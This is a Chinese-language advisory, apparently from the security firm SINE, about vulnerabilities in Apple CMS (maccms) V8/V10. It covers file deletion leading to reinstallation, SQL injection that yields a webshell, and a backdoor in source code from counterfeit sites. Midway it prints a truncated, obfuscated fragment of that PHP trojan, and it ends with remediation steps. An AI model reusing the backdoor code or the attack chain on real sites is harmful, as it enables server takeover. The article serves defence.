當(dāng)前位置:首頁 >  站長 >  建站經(jīng)驗 >  正文

蘋果CMS漏洞修復(fù) 對SQL遠程代碼注入及任意文件刪除修補辦法

 2020-01-07 11:33  來源: A5用戶投稿   我來投稿 撤稿糾錯

  域名預(yù)訂/競價,好“米”不錯過

目前蘋果CMS官方在不斷的升級補丁,官方最新的漏洞補丁對于目前爆發(fā)的新漏洞沒有任何效果。更新補丁的用戶網(wǎng)站還是會遭受到掛馬的攻擊,很多客戶因此找到我們SINE安全尋求網(wǎng)站安全技術(shù)上的支持,針對該漏洞我們有著獨特的安全解決方案以及防止掛馬攻擊的防護,包括一些未公開的maccms POC漏洞都有修復(fù)補丁。

目前maccms官方被百度網(wǎng)址安全中心提醒您:該站點可能受到黑客攻擊,部分頁面已被非法篡改! 蘋果官方網(wǎng)站因為特殊原因已經(jīng)停止訪問,該內(nèi)容被禁止訪問,但是升級補丁更新的網(wǎng)址還是可以打開的。

截圖如下:

蘋果CMS漏洞詳情:

蘋果CMS V8 V10版本存在代碼重裝漏洞,以及代碼后門漏洞,任意文件刪除漏洞,通過CNVD-2019-43865的信息安全漏洞通報,可以確認maccms V10存在漏洞,可以偽造惡意代碼發(fā)送到網(wǎng)站后端進行執(zhí)行,可以刪除網(wǎng)站目錄下的任意文件,可刪除重裝蘋果CMS系統(tǒng)的配置文件,導(dǎo)致可以重新安裝maccms系統(tǒng),并在安裝過程中插入sql注入代碼到數(shù)據(jù)庫中去執(zhí)行并獲取webshell以及服務(wù)器權(quán)限。

蘋果CMS V8 V10 源代碼存在后門漏洞,經(jīng)過我們SINE安全技術(shù)的檢測發(fā)現(xiàn),存在后門的原因是,目前百度搜索蘋果官網(wǎng),maccms官方,排在百度搜索首頁的都是仿冒的網(wǎng)站,真正官網(wǎng)地址是www.maccms.com,包括模板,圖片,以及CSS跟真正的官方是一模一樣,很多客戶都是點擊到這個山寨網(wǎng)站上去進行下載的源代碼,該代碼里隱藏了木馬后門文件,阿里云都無法檢測出來,

error_reporting(E_ERROR);

@ini_set('display_errors','Off');

@ini_set('max_execution_time',20000);

@ini_set('memory_limit','256M');

header("content-Type: text/html; charset=utf-8");

$password = "21232f297a57a5a743894a0e4a801fc3"; //Viv, bebegim..

define('Viv, bebegim.','Denzel-你的英雄'); // 標題

function s(){

$str = "66756r6374696s6r20737472646972282473747229207o2072657475726r207374725s

7265706p61636528617272617928275p5p272p272s2s272p27253237272p2725323

代碼如上面所示,是加密過的,經(jīng)過我們SINE安全的解密發(fā)現(xiàn)是PHP的腳本木馬,可以繞過各大服務(wù)器廠商的安全檢測,包括阿里云,騰訊云,百度云,華為云。

關(guān)于蘋果CMS網(wǎng)站漏洞的修復(fù)方案與辦法

對任意文件刪除漏洞做安全過濾與檢查,防止del刪除的語句的執(zhí)行,對前端傳輸過來的參數(shù)進行嚴格的檢測,不管是get,post,cookies,如果您對代碼不是太懂的話也可以找專業(yè)的網(wǎng)站安全公司來處理解決蘋果CMS網(wǎng)站被攻擊的問題,或者是對重裝文件進行改名以及安裝配置文件進行權(quán)限設(shè)置,只讀權(quán)限,對于存在網(wǎng)站木馬后門的蘋果cms系統(tǒng),人工對代碼進行安全審計,對所有網(wǎng)站目錄下每個代碼文件都要仔細的排查,可以下載官方的源代碼進行比對。

申請創(chuàng)業(yè)報道,分享創(chuàng)業(yè)好點子。點擊此處,共同探討創(chuàng)業(yè)新機遇!

相關(guān)文章

熱門排行

信息推薦